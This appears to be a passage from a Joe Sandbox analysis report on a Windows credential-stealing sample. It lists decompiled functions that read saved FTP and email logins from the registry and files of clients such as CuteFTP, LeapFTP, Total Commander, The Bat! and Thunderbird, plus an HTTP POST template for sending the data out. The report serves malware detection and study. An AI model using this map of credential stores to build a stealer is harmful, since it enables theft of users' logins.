InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403CC4
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403D0A
wsprintfA.USER32 ref: 00403D2F

Part of subcall function 00403BF8: setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403C1D

lstrlenA.KERNEL32(?,00001000,00001000,00001000), ref: 00403D5A
closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403DA5

Strings

POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403D27
<, xrefs: 00403CE4

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlensetsockoptwsprintf
String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
API String ID: 2761384797-2005047030
Opcode ID: 2b5b225140a011d5fa94f95724e4dc4ac8cdaac8ba449ec29ce0e43916d03e7f
Instruction ID: 5f7717a6d49742dac3458fc0ff4de133af0d4ec56afc4245b17f25aea9860e04
Opcode Fuzzy Hash: 2b5b225140a011d5fa94f95724e4dc4ac8cdaac8ba449ec29ce0e43916d03e7f
Instruction Fuzzy Hash: 9E41F631D00209AAEF11AFD1CC41BEEBE79AF44349F10843AF510B52A1D7B95A55DB19

Function 00405D8D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405DA3
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405DD7
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F83

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

RemoteDir, xrefs: 00405E69
Password, xrefs: 00405E0F
HostAdrs, xrefs: 00405E2D
Port, xrefs: 00405E8C
UserName, xrefs: 00405E4B

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: HostAdrs$Password$Port$RemoteDir$UserName
API String ID: 3369285772-3748300950
Opcode ID: 83de5721988879909b934d02520a36f5d7858ab19825fe1bb3338627fdf0edcf
Instruction ID: e43caad095013d876d34be9a6faa5c2b2fd077b182932feb9c9da737445d0b20
Opcode Fuzzy Hash: 83de5721988879909b934d02520a36f5d7858ab19825fe1bb3338627fdf0edcf
Instruction Fuzzy Hash: 2F41C53190011CFADF216B51CC42BDEBAB9BF44304F54C0BAB588741B1DB7A5B91AF98

Function 0040D825 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D838
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D86C
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA00

Strings

HostName, xrefs: 0040D8A4
Password, xrefs: 0040D8DA
PortNumber, xrefs: 0040D8FA
TerminalType, xrefs: 0040D915
UserName, xrefs: 0040D8BF

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$PortNumber$TerminalType$UserName
API String ID: 1332880857-1017491782
Opcode ID: 1e42fff59c8a3401b25850b4d0928db3ef35e302ce7de35f2e1fb856f2bab282
Instruction ID: 7f90cfe9abbe02165084e32a3781de3c4f967995d5724fcc174d63018c37eba3
Opcode Fuzzy Hash: 1e42fff59c8a3401b25850b4d0928db3ef35e302ce7de35f2e1fb856f2bab282
Instruction Fuzzy Hash: 3B41857184011CFADF616F51CC42BDDBABABF04304F5085BAB548741B1DB7A9BA1AF88

Function 004071E1 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071F4
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407228
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073BA

Strings

FtpDirectory, xrefs: 004072CC
FtpServer, xrefs: 00407296
FtpUserName, xrefs: 004072B1
_FtpPassword, xrefs: 0040727B
FtpPassword, xrefs: 00407260

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
API String ID: 1332880857-980612798
Opcode ID: 1585345eb313946bb772afd6a6b819466d12c316f537d3ffd6071d42423cbd18
Instruction ID: ed69391d3fbf79e033e7c56e4dc8bf61ef94230e28ffe02a357feb34859d1007
Opcode Fuzzy Hash: 1585345eb313946bb772afd6a6b819466d12c316f537d3ffd6071d42423cbd18
Instruction Fuzzy Hash: 5A41C53184011CBADF226F51CC42BDD7ABABF04304F54C1BAB948741B1DBBA5B91AF99

Function 00406FB6 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406FC9
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406FFD
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040718F

Strings

Password, xrefs: 00407035
_Password, xrefs: 00407050
Directory, xrefs: 004070A1
UserName, xrefs: 00407086
Server, xrefs: 0040706B

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Directory$Password$Server$UserName$_Password
API String ID: 1332880857-3317168126
Opcode ID: bfd9ca2203769a46a2ca111f1ad957b2d89285d5160d24b48c413b623b0ef977
Instruction ID: 470072a49d933337874d52f8a793f1173355220d0d1b0d4f5258c442bc1981ba
Opcode Fuzzy Hash: bfd9ca2203769a46a2ca111f1ad957b2d89285d5160d24b48c413b623b0ef977
Instruction Fuzzy Hash: 9941D63184011CBADF21AF51CC42BDD7ABABF04344F50C1BAB548781B1DBBA5B91AF89

Function 00406025 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040603B
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040606F
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406204

Strings

Port, xrefs: 004060E3
Username, xrefs: 00406101
HostDirName, xrefs: 0040611F
HostName, xrefs: 004060C5
Password, xrefs: 004060A7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostDirName$HostName$Password$Port$Username
API String ID: 1332880857-791697221
Opcode ID: a99725a83c487bc8e2d7b84090dbb5d88620b78899b2350e36d391a34c80abf6
Instruction ID: cfe77a76412509250b23a064962b32b4b25aafbcdeaf94a349052579620f6679
Opcode Fuzzy Hash: a99725a83c487bc8e2d7b84090dbb5d88620b78899b2350e36d391a34c80abf6
Instruction Fuzzy Hash: 0341A63184021CFADF217B51CC42BDCBAB9BF44304F50C1BAB559741B1DABA5BA19F88

Function 0040D3EB Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040D401
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D435
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D5B8

Strings

Pass, xrefs: 0040D4A9
Port, xrefs: 0040D4C7
Remote Dir, xrefs: 0040D4E5
User, xrefs: 0040D48B
Host, xrefs: 0040D46D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Pass$Port$Remote Dir$User
API String ID: 1332880857-1775099961
Opcode ID: 15fbf8702d2262ea6b65a1f7a3ed68f4eba4029672a7cee81137440431dfb4c8
Instruction ID: b4805bd7242b00b9ddf519bb23b1881e1ba85106e2876bb940d828b3e0396e8b
Opcode Fuzzy Hash: 15fbf8702d2262ea6b65a1f7a3ed68f4eba4029672a7cee81137440431dfb4c8
Instruction Fuzzy Hash: 7B41B331940118BADF227F51CD42FDCBAB6BF04304F5081BAB548740B1DA7A9BA5AF98

Function 0040C64E Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(011B3E08,BlazeFtp), ref: 0040C675

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

LastPassword, xrefs: 0040C6CF
LastUser, xrefs: 0040C703
LastAddress, xrefs: 0040C6E9
\BlazeFtp, xrefs: 0040C6C0
BlazeFtp, xrefs: 0040C66F
site.dat, xrefs: 0040C690, 0040C6BB
Software\FlashPeak\BlazeFtp\Settings, xrefs: 0040C6D4, 0040C6EE, 0040C708, 0040C724
LastPort, xrefs: 0040C71F

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
API String ID: 1884169789-2976447346
Opcode ID: 30673b7a28d785bc35bf7ecb67ccfe8c9ea75d26ea471e2f5f6ae481b17fd086
Instruction ID: 7dfc812850a862069b058b435ff72f01b7f8ab457aeaeeeaad88e161e10fa145
Opcode Fuzzy Hash: 30673b7a28d785bc35bf7ecb67ccfe8c9ea75d26ea471e2f5f6ae481b17fd086
Instruction Fuzzy Hash: 8131F731940209FADF126FA1CC82FADBE72AF40744F60453AB910751F1D7BA9AA19B4C

Function 00405204 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 69COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(011B3E08,CUTEFTP), ref: 0040522B

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

CUTEFTP, xrefs: 00405225
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 004052AF
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405295
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 004052C9
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 004052BC
\sm.dat, xrefs: 0040523F
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405288
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 004052A2

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
API String ID: 1884169789-2738976122
Opcode ID: 864fb766d5452e4e715f3483f269fcc451a76ac5c4caa4ee8c2e46c1c57938e4
Instruction ID: fb6da6a212dba04d11d560339f4344d71db33ae972742514da326522fc35cba6
Opcode Fuzzy Hash: 864fb766d5452e4e715f3483f269fcc451a76ac5c4caa4ee8c2e46c1c57938e4
Instruction Fuzzy Hash: CF114D70644509BADB113F21CC02FDE3E22AF94744F10407ABA15781E2DBB98AA1AE5C

Function 004038B9 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403941
lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403952
StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403973
StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 0040398A
lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 0040399B

Strings

Location:, xrefs: 00403982, 00403996
Content-Length:, xrefs: 00403939, 0040394D

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocLocal
String ID: Content-Length:$Location:
API String ID: 2140729754-2400408565
Opcode ID: e8ffa94ce4d694b39019d19632f52d281a77e285f97d3380fae7b04970062dbb
Instruction ID: d13be5a898ef7c92ffe78318898a519c71413f556bb4f1564f50c54def6c2146
Opcode Fuzzy Hash: e8ffa94ce4d694b39019d19632f52d281a77e285f97d3380fae7b04970062dbb
Instruction Fuzzy Hash: AC41B431F00149BBDB10AFA5DC45B9EFF69EF81308F208177B410B62E1DBB99A419B58

Function 00406B89 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406B9F
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406BD3
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D74

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

Password, xrefs: 00406C10
Hostname, xrefs: 00406C2E
Username, xrefs: 00406C4C
Port, xrefs: 00406C6F

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: Hostname$Password$Port$Username
API String ID: 3369285772-1811172798
Opcode ID: 70b3e5b315c4ec5d603e8bdfdf498d26a0901d80f443dcd0a952730f8badb1d1
Instruction ID: 9e560bf20e253cf620f0bf8f58e9f66f6026772323493f30a14cac2fd15d173a
Opcode Fuzzy Hash: 70b3e5b315c4ec5d603e8bdfdf498d26a0901d80f443dcd0a952730f8badb1d1
Instruction Fuzzy Hash: 0C41F57190011CFADF21AB51CC42BDDBAB9BF04304F54C0BAB189740B1DB799BA19F99

Function 00406955 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040696B
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040699F
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B14

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

Username, xrefs: 00406A13
Password, xrefs: 004069D7
Server, xrefs: 004069F5
FtpPort, xrefs: 00406A36

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: FtpPort$Password$Server$Username
API String ID: 3369285772-1828875246
Opcode ID: 78d8da263ec6a7853f817fc27451247fb88eb8edebb598097162be4fc9f44837
Instruction ID: c2799d5aff4dbc27275e197c9ccfa65bb5614a60f107031a19e96ed6569a589d
Opcode Fuzzy Hash: 78d8da263ec6a7853f817fc27451247fb88eb8edebb598097162be4fc9f44837
Instruction Fuzzy Hash: 5541C47190021CFADF217F51CC42BDDBAB9BF44304F50C0BAB149B41A1DAB95BA1AF99

Function 0040E062 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E072
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E1A2

Part of subcall function 0040421D: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404269
Part of subcall function 0040421D: LocalFree.KERNEL32(00000000), ref: 0040429D

Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF

Strings

Site, xrefs: 0040E081
UserID, xrefs: 0040E096
xflags, xrefs: 0040E0AD
Port, xrefs: 0040E0C2
Folder, xrefs: 0040E0D7

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
String ID: Folder$Port$Site$UserID$xflags
API String ID: 2167297517-269738940
Opcode ID: bedebaca43ca7a6652ba1ecd1ba44a3ebdb93cf312a1c3972445144c686f53ca
Instruction ID: 99f8a596b935f939f04ef1e9f78ab754f846f32f70ebc26a21a53360edf03044
Opcode Fuzzy Hash: bedebaca43ca7a6652ba1ecd1ba44a3ebdb93cf312a1c3972445144c686f53ca
Instruction Fuzzy Hash: FE318435900109BADF126F92CC42FEEBB76AF04704F50853BB551781F1D77A9A61EB48

Function 00407702 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407715
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407749
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407864

Strings

DataDir, xrefs: 0040779C
sites.dat, xrefs: 004077C3, 004077FC
InstallPath, xrefs: 00407781
sites.ini, xrefs: 004077DB, 00407814

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DataDir$InstallPath$sites.dat$sites.ini
API String ID: 1332880857-3870687875
Opcode ID: 7995c359595dec44803303d7f3979889ab6045d4bd9c4574d5891e1607afd5bf
Instruction ID: 41f403c1f211ac345a20322eebd65043438107ad4896e838d52a6925644287e4
Opcode Fuzzy Hash: 7995c359595dec44803303d7f3979889ab6045d4bd9c4574d5891e1607afd5bf
Instruction Fuzzy Hash: 3431063190021CFADF216F51CC46BDDBBBABF44304F50C4BAB248751A1DBB96A919F89

Function 0040F64A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F678

Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F6BD
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F6D8
SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F71D

Strings

Software\Mozilla, xrefs: 0040F687, 0040F6A4, 0040F6E7, 0040F704
\Thunderbird, xrefs: 0040F67D, 0040F69A, 0040F6DD, 0040F6FA
Thunderbird, xrefs: 0040F682, 0040F69F, 0040F6E2, 0040F6FF

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Software\Mozilla$Thunderbird$\Thunderbird
API String ID: 3062143572-138716004
Opcode ID: 4bf2e9daa6d2bf96a05ab6535975067cc3f3b5851bf6d91f7f349740728dac14
Instruction ID: 47e9b67bc361ea01282804338548f8079bf12a9657f3d13f5ec0334aac9f44a8
Opcode Fuzzy Hash: 4bf2e9daa6d2bf96a05ab6535975067cc3f3b5851bf6d91f7f349740728dac14
Instruction Fuzzy Hash: 03112130684208BACB11AF62CC47FDD7A799B04748F60C0A6B709750E2D6F98AD19B8D

Function 004078B9 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(011B3E08,unleap.exe), ref: 004078EB
lstrlenA.KERNEL32(unleap.exe,00000001,011B3E08,unleap.exe), ref: 00407904

Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

StrStrIA.SHLWAPI(011B4128,leapftp,011B3E08,unleap.exe), ref: 00407948

Strings

SOFTWARE\LeapWare, xrefs: 004079BE, 004079D1
unleap.exe, xrefs: 004078E5, 004078FF
sites.dat, xrefs: 00407919, 0040795E
leapftp, xrefs: 00407942
sites.ini, xrefs: 0040792D, 00407972

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
API String ID: 1884169789-1497043051
Opcode ID: 1975db484a2edb572d663d077a455cdba8d55228f2557e343ac24274fa8b9c54
Instruction ID: 373240b88979ee386ccafce9dc28ec783677a3504280557004698e1610f7e861
Opcode Fuzzy Hash: 1975db484a2edb572d663d077a455cdba8d55228f2557e343ac24274fa8b9c54
Instruction Fuzzy Hash: C0218471604204B9EB113B61CC06FEA7E1ADB80354F20843BB901B51E2D7BD5DD196AD

Function 0040ED97 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

wsprintfA.USER32 ref: 0040EE6C

Strings

Dir #%d, xrefs: 0040EE63
Default, xrefs: 0040EDFB
ProgramDir, xrefs: 0040EDCD
Count, xrefs: 0040EE2B
Software\RIT\The Bat!\Users depot, xrefs: 0040EE00, 0040EE30, 0040EE7C
Software\RIT\The Bat!, xrefs: 0040EDA4, 0040EDD2
Working Directory, xrefs: 0040ED9F

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
API String ID: 988369812-1921698578
Opcode ID: 550b5b3f0fdeb7335a23ebea4e6ed46425c412b6e63f0c220556618304f09542
Instruction ID: 3c6a3ae991e9433a380ac533950602d6b06fd5a2449390ce6c15b7b471f88e49
Opcode Fuzzy Hash: 550b5b3f0fdeb7335a23ebea4e6ed46425c412b6e63f0c220556618304f09542
Instruction Fuzzy Hash: 4031F735E0020CFADF01ABA2DD42ADE7B76EF04344F60897BB410B51E1D7799B60AB48

Function 00404A92 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404ABC

Strings

\GHISLER, xrefs: 00404AFC, 00404B1B, 00404B3A
InstallDir, xrefs: 00404B50, 00404BA1, 00404BF2, 00404C41
FtpIniName, xrefs: 00404B70, 00404BC1, 00404C11, 00404C60
Software\Ghisler\Total Commander, xrefs: 00404BA6, 00404BC6, 00404C46, 00404C65
Software\Ghisler\Windows Commander, xrefs: 00404B55, 00404B75, 00404BF7, 00404C16

Memory Dump Source

Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd

Yara matches

Similarity

API ID: AllocDirectoryLocalWindows
String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
API String ID: 3186838798-3636168975
Opcode ID: 92d519d9047ebb2fe0f84cdf8960490e0faba2c40265d55597503f581986c5a0
Instruction ID: 20f451b4e4197748d70b317d5a710515d99f39502e28a1532faddfeb6e84537c
Opcode Fuzzy Hash: 92d519d9047ebb2fe0f84cdf8960490e0faba2c40265d55597503f581986c5a0
Instruction Fuzzy Hash: 9441D0B0E80609BAEF123B61CC43FDD7E259F80754F20417BBA14B40F6DABD9A519A5C

Function 0040475C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404772
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004047A6
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004048CD

Strings

HostName, xrefs: 004047FC
User, xrefs: 0040481A
